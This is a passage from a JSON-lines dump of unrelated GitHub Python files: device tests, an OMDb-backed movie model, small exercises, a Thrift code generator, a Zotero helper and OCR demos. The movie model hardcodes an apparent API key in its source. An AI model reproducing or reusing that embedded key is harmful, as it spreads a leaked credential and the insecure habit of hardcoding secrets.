# Master switch must go last, otherwise its tests interfere with\r\n # the tests for the other switches since it overrides them.\r\n # Tests for the specific override behaviour are below.\r\n self.setUpMultiSwitch(\r\n [\r\n {\r\n \"name\": \"switch_outlet_1\",\r\n \"dps\": SWITCH1_DPS,\r\n \"device_class\": SwitchDeviceClass.OUTLET,\r\n },\r\n {\r\n \"name\": \"switch_outlet_2\",\r\n \"dps\": SWITCH2_DPS,\r\n \"device_class\": SwitchDeviceClass.OUTLET,\r\n },\r\n {\r\n \"name\": \"switch_master\",\r\n \"dps\": MASTER_DPS,\r\n \"device_class\": SwitchDeviceClass.OUTLET,\r\n },\r\n ]\r\n )\r\n self.setUpMultiSensors(\r\n [\r\n {\r\n \"name\": \"sensor_energy\",\r\n \"dps\": ENERGY_DPS,\r\n \"unit\": UnitOfEnergy.WATT_HOUR,\r\n },\r\n {\r\n \"name\": \"sensor_current\",\r\n \"dps\": CURRENT_DPS,\r\n \"device_class\": SensorDeviceClass.CURRENT,\r\n \"unit\": UnitOfElectricCurrent.MILLIAMPERE,\r\n \"state_class\": \"measurement\",\r\n },\r\n {\r\n \"name\": \"sensor_power\",\r\n \"dps\": POWER_DPS,\r\n \"device_class\": SensorDeviceClass.POWER,\r\n \"unit\": UnitOfPower.WATT,\r\n \"state_class\": \"measurement\",\r\n \"testdata\": (1234, 123.4),\r\n },\r\n {\r\n \"name\": \"sensor_voltage\",\r\n \"dps\": VOLTAGE_DPS,\r\n \"device_class\": SensorDeviceClass.VOLTAGE,\r\n \"unit\": UnitOfElectricPotential.VOLT,\r\n \"state_class\": \"measurement\",\r\n \"testdata\": (2345, 234.5),\r\n },\r\n ]\r\n )\r\n self.setUpMultiNumber(\r\n [\r\n {\r\n \"name\": \"number_timer_1\",\r\n \"dps\": COUNTDOWN1_DPS,\r\n \"max\": 86400,\r\n \"unit\": UnitOfTime.SECONDS,\r\n },\r\n {\r\n \"name\": \"number_timer_2\",\r\n \"dps\": COUNTDOWN2_DPS,\r\n \"max\": 86400,\r\n \"unit\": UnitOfTime.SECONDS,\r\n },\r\n ]\r\n )\r\n self.mark_secondary(\r\n [\r\n \"lock_child_lock\",\r\n \"number_timer_1\",\r\n \"number_timer_2\",\r\n \"select_initial_state\",\r\n \"switch_master\",\r\n \"sensor_energy\",\r\n \"sensor_current\",\r\n \"sensor_power\",\r\n \"sensor_voltage\",\r\n ],\r\n )\r\n\r\n # Since we have attributes, override the default test which expects none.\r\n def test_multi_switch_state_attributes(self):\r\n self.dps[TEST_DPS] = 21\r\n self.assertDictEqual(\r\n self.multiSwitch[\"switch_master\"].extra_state_attributes,\r\n {\r\n \"test_bit\": 21,\r\n },\r\n )\r\n\r\n def test_multi_sensor_extra_state_attributes(self):\r\n self.dps[CALIBA_DPS] = 1\r\n self.dps[CALIBE_DPS] = 2\r\n self.dps[CALIBV_DPS] = 3\r\n self.dps[CALIBW_DPS] = 4\r\n\r\n self.assertDictEqual(\r\n self.multiSensor[\"sensor_current\"].extra_state_attributes,\r\n {\"calibration\": 1},\r\n )\r\n self.assertDictEqual(\r\n self.multiSensor[\"sensor_energy\"].extra_state_attributes,\r\n {\"calibration\": 2},\r\n )\r\n self.assertDictEqual(\r\n self.multiSensor[\"sensor_voltage\"].extra_state_attributes,\r\n {\"calibration\": 3},\r\n )\r\n self.assertDictEqual(\r\n self.multiSensor[\"sensor_power\"].extra_state_attributes,\r\n {\"calibration\": 4},\r\n )\r\n","repo_name":"make-all/tuya-local","sub_path":"tests/devices/test_grid_connect_double_power_point.py","file_name":"test_grid_connect_double_power_point.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":613,"dataset":"github-code","pt":"61"} +{"seq_id":"21404912629","text":"import datetime\r\nimport math\r\n\r\nimport requests\r\nfrom google.cloud import ndb\r\n\r\nfrom backend import error\r\n\r\n\r\nclass NotFound(error.Error):\r\n pass\r\n\r\n\r\nclass Movie(ndb.Model):\r\n created = ndb.DateTimeProperty(indexed=False)\r\n title = 
ndb.StringProperty(required=True, indexed=True)\r\n year = ndb.StringProperty(indexed=True)\r\n imdbID = ndb.StringProperty(indexed=True)\r\n poster = ndb.StringProperty()\r\n normalized_title = ndb.ComputedProperty(\r\n lambda self: self.title and self.title.lower(), indexed=True\r\n )\r\n\r\n @classmethod\r\n def _query(cls, *filters, **kwargs):\r\n count = super()._query().count()\r\n if abs(count - 100) > 10:\r\n for page in range(1, math.ceil((100 - count) / 10) + 1):\r\n search_word = \"holiday\"\r\n movies = requests.get(\r\n f\"{cls._api_host}?s={search_word}&type=movie\"\r\n f\"&apikey={cls._apikey}&page={page}\"\r\n ).json()\r\n for item in movies.get(\"Search\", []):\r\n cls.create(\r\n title=item.get(\"Title\"),\r\n year=item.get(\"Year\"),\r\n imdbID=item.get(\"imdbID\"),\r\n poster=item.get(\"Poster\"),\r\n )\r\n count += 1\r\n if count >= 100:\r\n break\r\n # count = super()._query().count()\r\n # print(f\"{count} movies in database\")\r\n return super()._query(*filters, **kwargs)\r\n\r\n _apikey = \"3a396d25\"\r\n _api_host = \"https://www.omdbapi.com/\"\r\n query = _query\r\n\r\n @classmethod\r\n def get_by_title(cls, title):\r\n entities = cls.query(cls.title == title).fetch(1)\r\n return entities[0] if entities else None\r\n\r\n @classmethod\r\n def list(cls, offset=0, limit=10):\r\n return cls.query().order(Movie.title).fetch(offset=offset, limit=limit)\r\n\r\n @classmethod\r\n def create(cls, title: str, year=None, imdbID=None, poster=None):\r\n entity = cls(\r\n created=datetime.datetime.now(),\r\n title=title,\r\n year=year,\r\n imdbID=imdbID,\r\n poster=poster,\r\n )\r\n\r\n if all(x is None for x in (year, imdbID, poster)):\r\n resp = requests.get(\r\n f\"{cls._api_host}?t={title}&apikey={cls._apikey}\"\r\n ).json()\r\n entity.year = resp.get(\"Year\")\r\n entity.imdbID = resp.get(\"imdbID\")\r\n entity.poster = resp.get(\"Poster\")\r\n\r\n entity.put()\r\n return entity\r\n\r\n @classmethod\r\n def delete(cls, imdbID):\r\n entities = cls.query(cls.imdbID == imdbID).fetch(1)\r\n if entities:\r\n entities[0].key.delete()\r\n return True\r\n return False\r\n\r\n @property\r\n def id(self):\r\n return self.key.urlsafe().decode(\"utf-8\")\r\n\r\n def __hash__(self):\r\n return hash((self.__class__.__name__, self.id))\r\n","repo_name":"skippdot/abonea-python-test","sub_path":"backend/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"76007474","text":"\nfrom typing import List\n\n\ndef anagramMappings(A:List[int], B:List[int]) -> List[int]:\n\n\tmapdict = {}\n\n\tfor i in range(0,len(B)):\n\t\tmapdict[B[i]] = i\n\n\tprint(mapdict)\n\n\tansArray = []\n\tfor i in range(0,len(A)):\n\t\tansArray.append(mapdict[A[i]])\n\n\treturn ansArray \n\n\ndef anagramMappings_my(A:List[int], B:List[int]) -> List[int]:\n\n\t# brute-force variant: append the index of the first match in B (O(n*n))\n\tansArray = []\n\tfor i in range(0,len(A)):\n\t\tfor j in range(0,len(B)):\n\t\t\tif A[i] == B[j]:\n\t\t\t\tansArray.append(j)\n\t\t\t\tbreak\n\n\treturn ansArray
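\n\n# Added usage note (not part of the original solution): with the LeetCode\n# sample A = [12, 28, 46, 32, 50] and B = [50, 12, 32, 46, 28], anagramMappings\n# builds mapdict = {50: 0, 12: 1, 32: 2, 46: 3, 28: 4} and returns [1, 4, 3, 2, 0].\n","repo_name":"PanJianTing/LeetCode","sub_path":"760_FindAnagramMappings.py","file_name":"760_FindAnagramMappings.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16599749428","text":"#Smoothstaick Python Basics Day 2a\r\n#Coding Exercise 3\r\n#Patrick Hedquist\r\n#####################################\r\n\r\n#Question 1\r\n#write a string that returns the letter 'r' from 'Hello world'\r\n#For example, 'Hello World'[0] 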
returns 'H'. It should be one line of code\r\n#dont assign a variable to the string\r\n\r\nprint('Hello world'[8])\r\n\r\n#Question 2\r\n#String slicing to grab the word 'ink' from the word 'thinker'\r\n#S='hello' what is the output of h[1]? Answer: 'e'\r\n\r\nprint('thinker'[2:5])\r\nprint('\\n')\r\n\r\n#Question 3\r\n#S='Sammy' what is the output of S[2:]? Answer: mmy\r\n\r\nprint('Sammy'[2:])\r\nprint('\\n')\r\n\r\n#Question 4\r\n#With a single set function can you turn the word 'Mississippi' to distinct chatacter word?\r\n\r\nprint(set('Mississippi'))\r\nprint('\\n')\r\n\r\n#Question 5\r\n#The word or whole phase which has the same sequence of letters in both directions is called a palindrome\r\n#Here are a few examples\r\n# Stats\r\n# Amore, rose\r\n# No 'x' in Nixon\r\n# Was it a cat I saw?\r\n#your goal is to determine whether the phrase represents a palindrome or not\r\n\r\n\r\ninput1 = input(\"Enter word to test: \") #prints \"Enter word to test: \" and user can input a word\r\nlist = [input1] #creates a list using the word user inputted\r\ncont = input(\"add another word?(y/n)\") #ask user if they want to add new word\r\n\r\nwhile cont != 'n': #checks if answer is NOT n\r\n if cont == 'y': #checks if answer was y\r\n input2 = input(\"Enter word to test: \") #input word prompt\r\n list = list + [input2] #update list\r\n cont = input(\"add another word?(y/n)\") #ask user if they want new word\r\n\r\nfor i in list: #prints items in list on new lines\r\n print(i)\r\n\r\nans = []\r\n\r\n\r\ndef palindrome(pal): #algorithm based off code from Sachin Bisht on geeksforgeeks\r\n j = 0\r\n k = len(pal)-1\r\n pal = pal.lower()\r\n\r\n while (j <= k): #while loop to iterate through list and test palindromes\r\n if(not(pal[j] >= 'a' and pal[j] <= 'z')):\r\n j += 1\r\n elif (not(pal[k] >= 'a' and pal[k] <= 'z')):\r\n k -= 1\r\n elif (pal[j] == pal[k]):\r\n j += 1\r\n k -= 1\r\n else:\r\n return False\r\n return True\r\n\r\nfor i in list:\r\n if(palindrome(i)):\r\n ans = ans + ['Y']\r\n else:\r\n ans = ans + ['N']\r\n\r\nprint(len(list))\r\nprint(ans) #print ans list\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"prhedquist/SmoothStackAssignments","sub_path":"day2a.py","file_name":"day2a.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9289268237","text":"import argparse\nimport doctest\nimport os\nimport sys\nfrom enum import Enum\nfrom typing import Dict, Iterable, List, TextIO\n\n\nclass Target(Enum):\n NAME = 0\n THRIFT = 1\n CPP2 = 2\n\n\nTHRIFT_HEADER = f\"\"\"# This file was generated by `thrift/test/testset/generator.py`\n# {'@'}generated\n\nnamespace cpp2 apache.thrift.test.testset\n\"\"\"\n\nCPP2_HEADER = f\"\"\"// This file was generated by `thrift/test/testset/generator.py`\n// {'@'}generated\n\n#pragma once\n\n#include \n#include \n#include \n#include \n\nnamespace apache::thrift::test::testset {{\n\nenum class FieldModifier {{\n Optional = 1,\n Required,\n Reference,\n}};\n\nnamespace detail {{\n\ntemplate \nusing mod_set = fatal::sort>;\n\ntemplate \nstruct struct_ByFieldType;\n\ntemplate \nstruct exception_ByFieldType;\n\ntemplate \nstruct union_ByFieldType;\n\"\"\"\n\nCPP2_FOOTER = \"\"\"\n} // namespace detail\n\ntemplate \nusing struct_with = typename detail::struct_ByFieldType>::type;\n\ntemplate \nusing exception_with = typename detail::exception_ByFieldType>::type;\n\ntemplate \nusing union_with = typename 
detail::union_ByFieldType>::type;\n\n} // namespace apache::thrift::test::testset\n\"\"\"\n\nPRIMITIVE_TYPES = (\n \"bool\",\n \"byte\",\n \"i16\",\n \"i32\",\n \"i64\",\n \"float\",\n \"double\",\n \"binary\",\n \"string\",\n)\n\nKEY_TYPES = (\n \"string\",\n \"i64\",\n)\n\nCPP2_TYPE_NS = \"conformance::type\"\n\nPRIMATIVE_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"{}\",\n Target.THRIFT: \"{}\",\n Target.CPP2: CPP2_TYPE_NS + \"::{}_t\",\n}\n\nSTRUCT_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"struct_{}\",\n Target.THRIFT: \"struct {}\",\n Target.CPP2: CPP2_TYPE_NS + \"::struct_t<{}>\",\n}\n\nUNION_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"union_{}\",\n Target.THRIFT: \"union {}\",\n Target.CPP2: CPP2_TYPE_NS + \"::union_t<{}>\",\n}\n\nEXCEPTION_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"exception_{}\",\n Target.THRIFT: \"exception {}\",\n Target.CPP2: CPP2_TYPE_NS + \"::exception_t<{}>\",\n}\n\nLIST_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"list_{}\",\n Target.THRIFT: \"list<{}>\",\n Target.CPP2: CPP2_TYPE_NS + \"::list<{}>\",\n}\n\nSET_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"set_{}\",\n Target.THRIFT: \"set<{}>\",\n Target.CPP2: CPP2_TYPE_NS + \"::set<{}>\",\n}\n\nMAP_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"map_{}_{}\",\n Target.THRIFT: \"map<{}, {}>\",\n Target.CPP2: CPP2_TYPE_NS + \"::map<{}, {}>\",\n}\n\nOPTIONAL_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"optional_{}\",\n Target.THRIFT: \"optional {}\",\n Target.CPP2: \"{}|FieldModifier::Optional\",\n}\n\nREQUIRED_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"required_{}\",\n Target.THRIFT: \"required {}\",\n Target.CPP2: \"{}|FieldModifier::Required\",\n}\n\nCPP_REF_TRANSFORM: Dict[Target, str] = {\n Target.NAME: \"{}_cpp_ref\",\n Target.THRIFT: \"{} (cpp.ref = 'true')\",\n Target.CPP2: \"{}|FieldModifier::Reference\",\n}\n\n\ndef gen_primatives(\n target: Target, prims: Iterable[str] = PRIMITIVE_TYPES\n) -> Dict[str, str]:\n result = {}\n for prim in prims:\n value = PRIMATIVE_TRANSFORM[target].format(prim)\n result[PRIMATIVE_TRANSFORM[Target.NAME].format(prim)] = value\n return result\n\n\ndef _gen_unary_tramsform(\n transform: Dict[Target, str], target: Target, values: Dict[str, str]\n) -> Dict[str, str]:\n result = {}\n for name, value_t in values.items():\n result[transform[Target.NAME].format(name)] = transform[target].format(value_t)\n return result\n\n\ndef gen_lists(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(LIST_TRANSFORM, target, values)\n\n\ndef gen_sets(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(SET_TRANSFORM, target, values)\n\n\ndef gen_maps(\n target: Target, keys: Dict[str, str], values: Dict[str, str]\n) -> Dict[str, str]:\n result = {}\n for key_name, key_t in keys.items():\n for value_name, value_t in values.items():\n name = MAP_TRANSFORM[Target.NAME].format(key_name, value_name)\n value = MAP_TRANSFORM[target].format(key_t, value_t)\n result[name] = value\n return result\n\n\ndef gen_optional(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(OPTIONAL_TRANSFORM, target, values)\n\n\ndef gen_required(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(REQUIRED_TRANSFORM, target, values)\n\n\ndef gen_cpp_ref(target: Target, values: Dict[str, str]) -> Dict[str, str]:\n return _gen_unary_tramsform(CPP_REF_TRANSFORM, target, values)\n\n\ndef gen_union_fields(target: Target) -> Dict[str, 
str]:\n \"\"\"Generates field name -> type that are appropriate for use in unions.\"\"\"\n prims = gen_primatives(target, PRIMITIVE_TYPES)\n keys = gen_primatives(target, KEY_TYPES)\n\n lists = gen_lists(target, prims)\n sets = gen_sets(target, keys)\n maps = gen_maps(target, keys, prims)\n\n maps_to_sets = gen_maps(target, keys, sets)\n\n ret = {**prims, **lists, **sets, **maps, **maps_to_sets}\n ret.update(gen_cpp_ref(target, ret))\n return ret\n\n\ndef gen_struct_fields(target: Target) -> Dict[str, str]:\n \"\"\"Generates field name -> type that are appropriate for use in structs.\"\"\"\n ret = gen_union_fields(target)\n ret.update(**gen_optional(target, ret), **gen_required(target, ret))\n return ret\n\n\ndef gen_thrift_def(\n transform: Dict[Target, str], name: str, field_types: List[str]\n) -> str:\n \"\"\"Generate thrift struct from types\n >>> print(gen_thrift_def(STRUCT_TRANSFORM, \"Foo\", [\"i64\", \"optional string\", \"set (cpp.ref = 'true')\"]))\n struct Foo {\n 1: i64 field_1;\n 2: optional string field_2;\n 3: set (cpp.ref = 'true') field_3;\n } (thrift.uri=\"facebook.com/thrift/test/testset/Foo\")\n \"\"\"\n decl = transform[Target.THRIFT].format(name)\n lines = [f\"{decl} {{\"]\n for idx, field_type in enumerate(field_types):\n lines.append(\" {0}: {1} field_{0};\".format(idx + 1, field_type))\n lines.append(f'}} (thrift.uri=\"facebook.com/thrift/test/testset/{name}\")')\n return \"\\n\".join(lines)\n\n\ndef print_thrift_defs(\n transform: Dict[Target, str],\n fields: Dict[str, str],\n count: int = 1,\n *,\n file: TextIO = sys.stdout,\n) -> List[str]:\n \"\"\"Prints one thrift class def per field in fields and returns the names of all the classes.\"\"\"\n empty_name = transform[Target.NAME].format(\"empty\")\n print(gen_thrift_def(transform, empty_name, []), file=file)\n classes = [empty_name]\n for name, value_t in fields.items():\n class_name = transform[Target.NAME].format(name)\n classes.append(class_name)\n print(gen_thrift_def(transform, class_name, [value_t] * count), file=file)\n return classes\n\n\ndef gen_thrift(path: str) -> None:\n with open(path, \"w\") as file:\n print(THRIFT_HEADER, file=file)\n classes = []\n\n # Generate all structs.\n struct_fields = gen_struct_fields(Target.THRIFT)\n classes.extend(print_thrift_defs(STRUCT_TRANSFORM, struct_fields, file=file))\n\n # Generate all exceptions, with the struct fields.\n print_thrift_defs(EXCEPTION_TRANSFORM, struct_fields, file=file)\n\n # Generate all unions.\n union_fields = gen_union_fields(Target.THRIFT)\n classes.extend(\n print_thrift_defs(UNION_TRANSFORM, union_fields, count=2, file=file)\n )\n\n # Generate a struct of all defined structs and unions.\n all_struct_name = STRUCT_TRANSFORM[Target.NAME].format(\"all\")\n print(gen_thrift_def(STRUCT_TRANSFORM, all_struct_name, classes), file=file)\n\n\nCPP2_SPECIALIZE_TEMPLATE = \"\"\"template <>\nstruct {}<{}, mod_set<{}>> {{\n using type = {};\n}};\n\"\"\"\n\n\ndef print_cpp2_specialization(\n transform: Dict[Target, str], fields: Dict[str, str], *, file: TextIO = sys.stdout\n) -> None:\n for field, value_mods in fields.items():\n splits = value_mods.split(\"|\")\n value_t = splits[0]\n mods = \", \".join(splits[1:])\n by_type = transform[Target.NAME].format(\"ByFieldType\")\n name = transform[Target.NAME].format(field)\n print(CPP2_SPECIALIZE_TEMPLATE.format(by_type, value_t, mods, name), file=file)\n\n\ndef gen_cpp2(path: str) -> None:\n with open(path, \"w\") as file:\n print(CPP2_HEADER, file=file)\n\n # Generate specialization for all structs.\n 
struct_fields = gen_struct_fields(Target.CPP2)\n print_cpp2_specialization(STRUCT_TRANSFORM, struct_fields, file=file)\n\n # Generate specialization for all exceptions.\n print_cpp2_specialization(EXCEPTION_TRANSFORM, struct_fields, file=file)\n\n # Generate specialization for all unions.\n union_fields = gen_union_fields(Target.CPP2)\n print_cpp2_specialization(UNION_TRANSFORM, union_fields, file=file)\n\n print(CPP2_FOOTER, file=file)\n\n\ndef generate(dir: str) -> None:\n gen_thrift(os.path.join(dir, \"testset.thrift\"))\n gen_cpp2(os.path.join(dir, \"Testset.h\"))\n\n\ndef main() -> None:\n doctest.testmod()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--install_dir\", required=True)\n args = parser.parse_args()\n generate(args.install_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Dakingrai/ood-generalization-semantic-boundary-techniques","sub_path":"third_party/fbthrift/thrift/test/testset/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":9612,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"32977523908","text":"import sys\nimport os.path\nimport re\nimport math\n\nsys.path.append(os.path.dirname(os.path.realpath(__file__))+'/util')\nimport helpers\n\n\nfilename = './gmail_uber.json';\nregexp = re.compile('(\\| (.*?) [0-9]{0,6}, India)', re.IGNORECASE)\n#8:56pm | Vijaya Raghava Rd, Parthasarathi Puram, T Nagar, Chennai, Tamil Nadu 600017, India 09:15pm |\n\nsplit = 4\nthresold = 80\n\ndef split_str(string):\n\t\n\tchar = ''\n\tsegments = []\n\tfor k,c in enumerate(string):\n\t\tif k%split == 0 and k > 0:\n\t\t\tsegments.append(char)\n\t\t\tchar = ''\n\t\t\n\t\tchar += c\n\n\treturn segments\n\t\t\t\ndef percentage(segments1, segments2):\n\tcount1 = len(segments1)\n\tcount2 = len(segments2)\n\n\tif count1 <= count2:\n\t\tsegments = segments1\n\t\talt_segments = segments2\n\t\tcount = count1;\n\telse:\n\t\tsegments = segments2\n\t\talt_segments = segments1\n\t\tcount = count2;\n\n\tmatch_count = 0;\n\tfor k,segment in enumerate(segments):\n\t\tif alt_segments[k] == segment:\n\t\t\tmatch_count += 1;\n\n\treturn math.ceil((match_count/count)*100)\t\t\n\t\n\ndef compare_str(string1, string2):\n\tstring1 = helpers.alpha_numeric(string1)\n\tstring2 = helpers.alpha_numeric(string2)\n\n\tsegments1 = split_str(string1)\n\tsegments2 = split_str(string2)\n\n\tif percentage(segments1, segments2) >= thresold:\n\t\treturn True\n\n\treturn False\t\n\n\ndef unique(a):\n\t\n\ti1 = 0\n\tfor i in a[i1:-1]:\n\t\ti2 = i1+1\n\t\tfor k in a[i2:]:\n\t\t\tif compare_str(a[i1],a[i2]):\n\t\t\t\t#print('Removing ...'+a[i2], \"\\t Index: %s\" %i2)\n\t\t\t\ta.pop(i2)\n\t\t\telse:\n\t\t\t\ti2 += 1\n\n\t\ti1 += 1\n\n\treturn a\n\t\t\t\t\n\ndef file_to_str(filename):\n\twith open(filename) as f:\n\t\treturn f.read()\n\ndef extract(contents):\n\treturn (match[0].strip('|, ') for match in re.findall(regexp, contents))\t\t\n\n\n\nif __name__ == '__main__':\n\t\n\ti = 0;\n\tfh = open('output.txt', 'w')\n\n\tcontents = list(extract(file_to_str(filename)))\n\tcontents = unique(contents)\n\tfor line in contents:\n\t\ti += 1;\n\t\tfh.write(\"%s\" % i +\". 
\"+line+\"\\n\")\n\n\t\n\n\n","repo_name":"j81k/parser","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5846035956","text":"\"\"\"\nSurprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:\n 1634 = 1**4 + 6**4 + 3**4 + 4**4\n 8208\n 9474\n\n The sum of these numbers is 19316.\n\n Find the sum of all the numbers that can be written as the sum of Nth powers of their digits.\n\n\"\"\"\nfrom itertools import product\n\n\n\n\ndef max_number_len(n):\n \"\"\"Find max power of 10 which can be less or equals than sum of its digits power.\"\"\"\n power_of_9 = 9**n\n k = 1\n while k*power_of_9 >= 10 ** k:\n k += 1\n return k\n\n\ndigits = [i for i in range(10)]\ndigit_power = [0] * 10\nsum_powers = set()\n\n\ndef digits_product(k):\n nums = [0] * k\n while True:\n yield nums\n for i in range(k):\n nums[i] += 1\n if nums[i] != 10:\n for j in range(i):\n if nums[j] < nums[i]:\n nums[j] = nums[i]\n break\n nums[i] = 0\n if i == k-1:\n return\n\n\ndef number_to_digits(num):\n \"\"\"Return sorted list of digits in number.\"\"\"\n return sorted(int(ch) for ch in str(num))\n\n\ndef find_sum(n):\n for i in range(10):\n digit_power[i] = i ** n\n\n sum_len = 2\n while sum_len * digit_power[9] >= 10 ** (sum_len - 1):\n for p in digits_product(sum_len):\n p_sum = sum(digit_power[digit] for digit in p)\n if sorted(p) == number_to_digits(p_sum):\n sum_powers.add(p_sum)\n sum_len += 1\n return sum(sum_powers)\n\n\n# print(find_sum(5))\nn = int(input())\nprint(find_sum(n))\n\n","repo_name":"mqq-marek/ProjectEuler","sub_path":"ProjectEuler/Problems_001_050/P030_DigitNthPowers.py","file_name":"P030_DigitNthPowers.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32890860175","text":"import dataset\nimport models.crnn as crnn\nimport torch\nimport utils\nfrom PIL import Image\nfrom torch.autograd import Variable\n\nfrom definitions import ROOT_DIR\n\nmodel_path = ROOT_DIR + \"/scr/text_recognition/crnn_pytorch/data/crnn.pth\"\nalphabet = \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n\ndef recognize_text(img_path: str) -> str:\n model = crnn.CRNN(32, 1, 37, 256)\n if torch.cuda.is_available():\n model = model.cuda()\n\n model.load_state_dict(torch.load(model_path))\n\n converter = utils.strLabelConverter(alphabet)\n\n transformer = dataset.resizeNormalize((100, 32))\n image = Image.open(img_path).convert(\"L\")\n image = transformer(image)\n if torch.cuda.is_available():\n image = image.cuda()\n image = image.view(1, *image.size())\n image = Variable(image)\n\n model.eval()\n preds = model(image)\n\n _, preds = preds.max(2)\n preds = preds.transpose(1, 0).contiguous().view(-1)\n\n preds_size = Variable(torch.IntTensor([preds.size(0)]))\n raw_pred = converter.decode(preds.data, preds_size.data, raw=True)\n sim_pred = converter.decode(\n preds.data, preds_size.data, raw=False\n ) # print('%-20s => %-20s' % (raw_pred, sim_pred))\n return sim_pred\n","repo_name":"Sandpitturtleee/image_to_text_detection","sub_path":"scr/text_recognition/crnn_pytorch/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27421896562","text":"#!/bin/python3\n\nfrom urllib.request import 
urlopen\nfrom urllib.parse import urlencode\nimport re\n\n\nzotxturl = \"http://127.0.0.1:23119/zotxt/\"\nzotxturlselect = zotxturl + 'select?'\nlinkurl = \"zotero://select/items/\"\npattern = re.escape(linkurl) + r'([@]*)(.+)'\npattern = re.compile(pattern)\n\ndef main(arg):\n data = {}\n m = pattern.match(arg)\n if m.group(1) == '@':\n data['betterbibtexkey'] = m.group(2)\n else:\n data['key'] = m.group(2)\n data = urlencode(data)\n url = zotxturlselect + data\n try:\n urlopen(url)\n except Exception as e:\n print(f'ERROR: got an exception {e}\\n{m.group(0)}\\n{url}')\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='This program uses zotxt to select an '\n 'entry in Zotero')\n parser.add_argument('url', help='Zotero URL')\n\n args = parser.parse_args()\n main(args.url)\n","repo_name":"shivams/zim-zotero-plugin","sub_path":"zotxt-select.py","file_name":"zotxt-select.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"39694018128","text":"a = int(input(\"Enter a value of a:\")) # ask for the lower bound of the search range\nb = int(input(\"Enter a value of b:\")) # ask for the upper bound of the search range\ni = a\nfor i in range(a, b): # search every number from a up to b\n n = 0\n for j in range(1, i): # range(1, i) covers every proper divisor\n if i % j == 0:\n n += j # accumulate the sum of the divisors of the number\n if n == i: # check whether the number is perfect\n print(n) # print the number if it is perfect\n
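\n# Added check (not part of the original exercise): with a = 1 and b = 100 the\n# loop prints the perfect numbers 6 (1+2+3) and 28 (1+2+4+7+14).\n","repo_name":"kopeishnik/IP-01-Zelenskyi-labs","sub_path":"lab5-py.py","file_name":"lab5-py.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20419737854","text":"import logging\nimport sqlite3\nimport datetime\nfrom logger import logger\n\nfrom sqlalchemy import create_engine, MetaData, select, text\nfrom sqlalchemy.orm import sessionmaker\n\nimport easyocr\nimport os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport util\nfrom dbi import create_plates\n\n\ndef search_plate(name_file, dir):\n\n \"\"\" search only plate in new car image \"\"\"\n model_cfg_path = os.path.join('.', 'model', 'cfg', 'darknet-yolov3.cfg')\n model_weights_path = os.path.join('.', 'model', 'weights', 'model.weights')\n class_names_path = os.path.join('.', 'model', 'class.names')\n\n img_path = dir\n\n \"\"\" load class names \"\"\"\n with open(class_names_path, 'r') as f:\n class_names = [j[:-1] for j in f.readlines() if len(j) > 2]\n f.close()\n\n \"\"\" load model \"\"\"\n net = cv2.dnn.readNetFromDarknet(model_cfg_path, model_weights_path)\n\n \"\"\" load image \"\"\"\n croop_image = cv2.imread(img_path)\n img = croop_image[600:1000, 800:1600]\n\n #cv2.imwrite(\"model/gfg.jpg\", img)\n\n H, W, _ = img.shape\n\n \"\"\" convert image \"\"\"\n blob = cv2.dnn.blobFromImage(img, 1 / 255, (416, 416), (0, 0, 0), True)\n\n \"\"\" get detections \"\"\"\n net.setInput(blob)\n\n detections = util.get_outputs(net)\n\n \"\"\" bboxes, class_ids, confidences \"\"\"\n bboxes = []\n class_ids = []\n scores = []\n\n for detection in detections:\n # [x1, x2, x3, x4, x5, x6, ..., x85]\n bbox = detection[:4]\n\n xc, yc, w, h = bbox\n bbox = [int(xc * W), int(yc * H), int(w * W), int(h * H)]\n\n bbox_confidence = detection[4]\n\n class_id = np.argmax(detection[5:])\n score = np.amax(detection[5:])\n\n bboxes.append(bbox)\n class_ids.append(class_id)\n scores.append(score)\n\n \"\"\" apply nms 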